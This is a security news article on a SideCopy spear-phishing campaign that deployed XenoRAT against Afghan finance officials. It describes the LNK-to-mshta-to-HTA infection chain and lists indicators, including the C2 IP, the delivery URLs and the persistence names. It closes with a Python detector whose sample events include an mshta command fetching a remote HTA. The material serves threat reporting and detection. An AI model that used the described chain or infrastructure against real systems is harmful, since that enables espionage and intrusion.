SideCopy Uses XenoRAT in Spear Phishing Attack on Afghanistan Finance Ministry


A Pakistan-linked threat group tracked as SideCopy targeted Afghanistan’s Ministry of Finance with a spear phishing campaign that deployed XenoRAT, an open-source remote access trojan. The campaign, called Operation XENOFISCAL, focused on provincial finance officials and used a Pashto-language lure to make the attack look relevant to Afghan government workers.

Seqrite Labs attributed the activity to the SideCopy APT cluster with medium-to-high confidence. The researchers said the campaign targeted Afghanistan’s Ministry of Finance, provincial revenue and finance directorates, and Pashto-speaking provincial government employees.

The attack began with a ZIP archive containing a malicious Windows shortcut file. Once opened, the shortcut abused mshta.exe to fetch a remote HTA payload from a compromised Afghan education domain, then moved through several stages before installing XenoRAT 1.8.7 on the infected Windows host.

Operation XENOFISCAL targeted Afghanistan’s finance network

The lure file used a Pashto filename that translated to a list of employees introduced to a seminar on intellectual and psychological warfare. That theme suggests the attackers understood the administrative context of their targets and designed the phishing document for provincial officials.

According to The Hacker News, the campaign also targeted provincial revenue and finance directorates, known as Mustoufiats. These regional finance offices play an important role in Afghanistan’s revenue and finance administration.

SideCopy is widely viewed as a Pakistan-linked cluster operating under the broader Transparent Tribe, also known as APT36, umbrella. Zscaler ThreatLabz has previously described APT36 as a Pakistan-attributed threat group that has targeted government organizations and used evolving tactics, techniques, and tools.

Key details at a glance

Item | Details
--- | ---
Campaign name | Operation XENOFISCAL
Attributed group | SideCopy, linked to Transparent Tribe or APT36
Main target | Afghanistan Ministry of Finance
Targeted users | Provincial revenue and finance officials
Initial file | ZIP archive with a Pashto-named malicious LNK file
Final payload | XenoRAT 1.8.7
Main techniques | mshta execution, HTA delivery, registry persistence, staged loaders, scheduled task persistence

The use of a local Afghan education domain for delivery also made the campaign harder to spot. Traffic to domestic infrastructure can look less suspicious than traffic to newly registered foreign domains, especially in government networks that already communicate with local public-sector systems.

The final command-and-control server sat separately from the delivery domain. This separation helps attackers maintain access even if defenders discover and block the first-stage delivery site.

How the infection chain worked

The infection chain started when the victim opened the malicious shortcut file. The LNK launched mshta.exe, a legitimate Windows utility that can run HTML Application content. Attackers often abuse this binary because it lets malicious scripts run through a trusted Microsoft-signed tool.

MITRE ATT&CK’s mshta technique explains that adversaries may abuse mshta.exe to proxy execution of malicious HTA files, JavaScript, or VBScript through a trusted Windows utility. That matches the early stage of the Operation XENOFISCAL chain.

After mshta fetched the HTA payload, obfuscated JavaScript decoded in memory and established registry-based persistence. The malware disguised a Run key as a Microsoft Edge-related entry, then continued to stage loader components and the final XenoRAT payload.

Five-stage attack flow

Stage | Observed behavior | Defender concern
--- | --- | ---
1. Spear phishing | ZIP archive delivers a malicious Pashto-named LNK file | Targeted lure designed for Afghan finance officials
2. HTA execution | LNK uses mshta.exe to fetch a remote payload | Trusted Windows utility runs attacker code
3. JavaScript staging | Obfuscated JavaScript decodes in memory | Reduced disk artifacts and harder static detection
4. Loader execution | .NET loader components retrieve and unpack encoded payload data | Staged delivery hides the final malware until later in the chain
5. XenoRAT deployment | XenoRAT 1.8.7 connects to remote C2 and creates persistence | Remote control, surveillance, and long-term access

The operation used living-off-the-land behavior at the start and a fileless-style loading approach in later stages. That combination gives attackers a better chance of avoiding older antivirus rules that focus only on known executable files written to disk.

Infection Chain (Source – Seqrite)

The malware also dropped a decoy document that appeared to be a real Afghan Ministry of Finance staff directory. Seqrite said the document listed officials across all 34 provinces, including finance directors, revenue chiefs, financial officers, and secretaries, along with mobile numbers.

XenoRAT gave attackers broad control of infected systems

XenoRAT is an open-source remote access tool written in C#. Its public GitHub repository describes it as a remote access tool for controlling Windows 10 and Windows 11 systems, with features such as screen control, webcam access, live microphone, reverse proxy, file management, registry management, shell access, and keylogging.

Those features make XenoRAT dangerous when used by an espionage group. On a compromised government workstation, a RAT can help attackers read files, capture credentials, watch activity, move through local data, and maintain covert access.

In this campaign, XenoRAT connected to a hard-coded command-and-control IP address over encrypted TCP traffic. It also used a mutex named clouda to avoid duplicate instances and queried installed antivirus products before reporting back to the operators.

Shellcode Execution (Source – Seqrite)

Persistence and infrastructure details

The malware used more than one persistence method. It created a Registry Run key under HKCU and also registered a scheduled task named XenoUpdateManager. That gives the RAT a way to restart after reboot and continue communications with attacker infrastructure.

MITRE ATT&CK’s scheduled task technique describes how adversaries use Windows Task Scheduler or schtasks.exe to execute payloads at a chosen time or trigger. XenoRAT’s scheduled task fits that persistence pattern.

The infrastructure design also shows planning. The delivery domain abimj.edu.af resolved to Afghan-hosted IP addresses, while the XenoRAT C2 server was hosted on a European provider. This split makes remediation harder because blocking the delivery site alone may not remove active implants.

Selected indicators of compromise

Type | Indicator | Description
--- | --- | ---
Domain | abimj.edu.af | Compromised Afghan education domain used for payload delivery
URL | hxxp://abimj.edu.af/index.php | Stage-1 HTA/PHP payload endpoint
URL | hxxp://abimj.edu.af/institute/cloudiyaf/document.pdf | Decoy PDF download URL
URL | hxxps://abimj.edu.af/institute/10/ | Stage-2 payload download URL
URL | hxxps://abimj.edu.af/institute/7/ | Alternate Stage-2 URL for Windows 7 targets
IP address | 185.235.137.106 | XenoRAT C2 server
IP address | 103.132.98.224 | Delivery domain resolved IP
IP address | 103.132.98.226 | Delivery domain resolved IP
Registry key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run “Edgre” | Persistence Run key masquerading as Microsoft Edge
Scheduled task | XenoUpdateManager | Persistence task created by XenoRAT
Mutex | clouda | XenoRAT single-instance mutex
File name | zuidrt.hta | Persistent HTA payload stored in a public folder
File name | noway.bat | Hidden batch file used for registry persistence execution
File name | WayBroad.dll | Stage-1 loader DLL
File name | Aotestpass.dll | Stage-2 loader DLL
File name | UpdateChecker.dll | XenoRAT-related payload name observed in the campaign

Hash-based IoCs can help with triage, but defenders should not rely on them alone. Attackers can change ZIP archives, shortcut files, loaders, and payload packaging quickly, while the behavior around mshta, HTA retrieval, registry persistence, and scheduled task creation tends to remain more useful for detection.

The campaign also shows how a compromised local website can become part of an espionage operation. Security teams should treat unexpected payload delivery from familiar regional domains with the same caution as delivery from new or foreign infrastructure.

What defenders should monitor

  • Unexpected mshta.exe launches from ZIP archives, LNK files, email attachments, or user profile paths.
  • HTA, JavaScript, or VBScript execution that follows a shortcut file opening.
  • New Run keys under HKCU that imitate Microsoft Edge or other trusted software names.
  • Scheduled tasks named XenoUpdateManager or tasks that launch unusual payloads from user-writable folders.
  • Outbound traffic to 185.235.137.106 or suspicious European hosting providers from finance ministry systems.
  • Connections to abimj.edu.af paths that do not match normal browser activity.
  • Files named zuidrt.hta, noway.bat, WayBroad.dll, Aotestpass.dll, or UpdateChecker.dll in unusual directories.
  • Mutex creation using the name clouda.
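To turn the monitoring list above into something that can run over endpoint telemetry, here is an added Python example (not Seqrite's or the article's code) that scores constructed Sysmon-style events against the indicators and behaviours the article lists. The event field names, the rule names, and the use of explorer.exe as a stand-in for a double-clicked LNK are assumptions.

```python
import re

# Indicators below come from the article's IoC table; the events and rule names are constructed.
C2_IP = "185.235.137.106"
DELIVERY_DOMAIN = "abimj.edu.af"
TASK_NAME = "xenoupdatemanager"
SUSPECT_FILES = {"zuidrt.hta", "noway.bat", "waybroad.dll", "aotestpass.dll", "updatechecker.dll"}
USER_WRITABLE = re.compile(r"\\(users|programdata|public)\\", re.I)   # user-writable drop locations
SCRIPT_HOSTS = re.compile(r"(mshta|wscript|cscript|powershell)\.exe|\.(hta|bat|js|vbs)\b", re.I)

def score_event(ev):
    """Return the rule names an event trips; an empty list means nothing suspicious."""
    hits, kind = [], ev["type"]
    if kind == "process" and ev["image"].lower().endswith("mshta.exe"):
        cmd = ev.get("cmdline", "")
        if re.search(r"https?://", cmd, re.I) or DELIVERY_DOMAIN in cmd.lower():
            hits.append("mshta_remote_hta")           # stage 2: HTA fetched over the network
        # explorer.exe as parent approximates a double-clicked LNK; also catch user-profile paths
        if ev.get("parent", "").lower().endswith("explorer.exe") or USER_WRITABLE.search(cmd):
            hits.append("mshta_from_user_context")
    elif kind == "registry" and ev["key"].lower().endswith("\\currentversion\\run"):
        # Run value whose name imitates Edge but whose data launches a script host or script file
        if "edg" in ev["value_name"].lower() and SCRIPT_HOSTS.search(ev["data"]):
            hits.append("run_key_edge_masquerade")
    elif kind == "task" and (ev["name"].lower() == TASK_NAME or USER_WRITABLE.search(ev["action"])):
        hits.append("suspicious_scheduled_task")
    elif kind == "network" and (ev["dst_ip"] == C2_IP or ev.get("dst_host", "").lower().endswith(DELIVERY_DOMAIN)):
        hits.append("known_infrastructure")
    elif kind == "file" and ev["path"].rsplit("\\", 1)[-1].lower() in SUSPECT_FILES:
        hits.append("known_dropped_file")
    elif kind == "mutex" and ev["name"] == "clouda":
        hits.append("xenorat_mutex")
    return hits

SAMPLE_EVENTS = [  # constructed to mirror the chain the article describes, plus one benign mshta use
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "mshta.exe https://abimj.edu.af/index.php"},
    {"id": 2, "type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Edgre", "data": r"C:\Users\Public\noway.bat"},
    {"id": 3, "type": "task", "name": "XenoUpdateManager", "action": r"C:\Users\u\AppData\Roaming\UpdateChecker.dll"},
    {"id": 4, "type": "network", "dst_ip": "185.235.137.106"},
    {"id": 5, "type": "file", "path": r"C:\Users\Public\zuidrt.hta"},
    {"id": 6, "type": "mutex", "name": "clouda"},
    {"id": 7, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Vendor\setup.exe", "cmdline": r"mshta.exe C:\Program Files\Vendor\ui.hta"},
]

def run(events=SAMPLE_EVENTS):
    # Map event id -> tripped rules, dropping clean events (event 7 should not appear)
    scored = {ev["id"]: score_event(ev) for ev in events}
    return {i: h for i, h in scored.items() if h}
```

Event 7 shows the mshta rules staying quiet for a locally installed HTA launched by a vendor installer, which is the kind of benign use that a blanket "alert on mshta" rule would flood on.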

The campaign’s use of mshta deserves special attention because it fits a common defense evasion pattern. A second look at MITRE’s mshta guidance shows why this signed Windows binary remains attractive to attackers: it can run script content through a trusted utility that already exists on the system.

Likewise, scheduled task monitoring can reveal long-term access attempts. The MITRE scheduled task entry notes that adversaries use the Task Scheduler utility and related APIs for persistence, execution, and privilege-related goals.

Why SideCopy’s tactics matter for government networks

SideCopy’s use of a tailored Pashto lure, a ministry-themed decoy, and Afghan-hosted delivery infrastructure suggests a targeted operation rather than broad commodity malware distribution. The attackers designed the chain around the language, institutions, and administrative workflows of the victims.

Zscaler’s APT36 research also shows how Transparent Tribe-related activity has repeatedly used phishing and new tooling against government targets. The Afghanistan campaign follows the same strategic pattern, but with a lure tailored to Afghan finance offices.

For targeted government agencies, user training must go beyond generic phishing warnings. Officials should learn how malicious LNK files, fake PDF icons, archive attachments, and local-language lures can hide malware even when the filename looks work-related.

Immediate mitigation steps

Priority | Action | Reason
--- | --- | ---
High | Block known C2 and delivery indicators | Reduces active communication with attacker infrastructure
High | Hunt for mshta child processes and HTA execution | Finds the early execution stage
High | Audit Registry Run keys and scheduled tasks | Finds persistence linked to the RAT
Medium | Restrict HTA execution where business processes do not require it | Reduces abuse of mshta and HTA payloads
Medium | Apply application allow-listing for scripts and shortcuts | Blocks many LNK-to-script execution paths
Medium | Review finance-related phishing attachments in Pashto and Dari | Helps find related targeting attempts

XenoRAT’s public feature list also makes the risk clear. The XenoRAT project page lists functions such as screen control, webcam, microphone, keylogging, file management, registry management, shell access, reverse proxy, and startup behavior.

Security teams should treat any XenoRAT infection as a full compromise event. Affected systems should be isolated, credentials used on those systems should be rotated, persistence should be removed, and logs should be reviewed for lateral movement or data access.

The public reporting on Operation XENOFISCAL confirms that the campaign fits a broader pattern of SideCopy activity aimed at South Asian entities. For Afghanistan’s finance sector, the incident shows how targeted phishing can turn a single local-language attachment into a persistent espionage foothold.

The strongest defense is layered detection. Teams need email filtering, shortcut file controls, mshta monitoring, registry and task auditing, endpoint isolation playbooks, and user reporting channels that work in the languages attackers use for their lures.

FAQ

What is Operation XENOFISCAL?

Operation XENOFISCAL is a SideCopy spear phishing campaign targeting Afghanistan’s Ministry of Finance and provincial finance officials. The campaign used a Pashto-language lure and deployed XenoRAT on infected Windows systems.

Who is SideCopy?

SideCopy is a Pakistan-linked threat cluster associated with the broader Transparent Tribe or APT36 umbrella. It has been linked to espionage activity against South Asian government, defense, and public-sector targets.

How did the SideCopy attack begin?

The attack began with a spear phishing email carrying a ZIP archive. Inside was a malicious LNK file disguised with a PDF icon and a Pashto filename designed to appeal to Afghan government finance officials.

What is XenoRAT?

XenoRAT is an open-source remote access trojan written in C#. It can provide remote control, file management, keylogging, screen control, webcam and microphone access, reverse proxy functions, and persistence features.

How can defenders detect this campaign?

Defenders should monitor mshta.exe execution from shortcut files, HTA downloads from unusual domains, suspicious Registry Run keys, the XenoUpdateManager scheduled task, the clouda mutex, and outbound traffic to known C2 infrastructure.
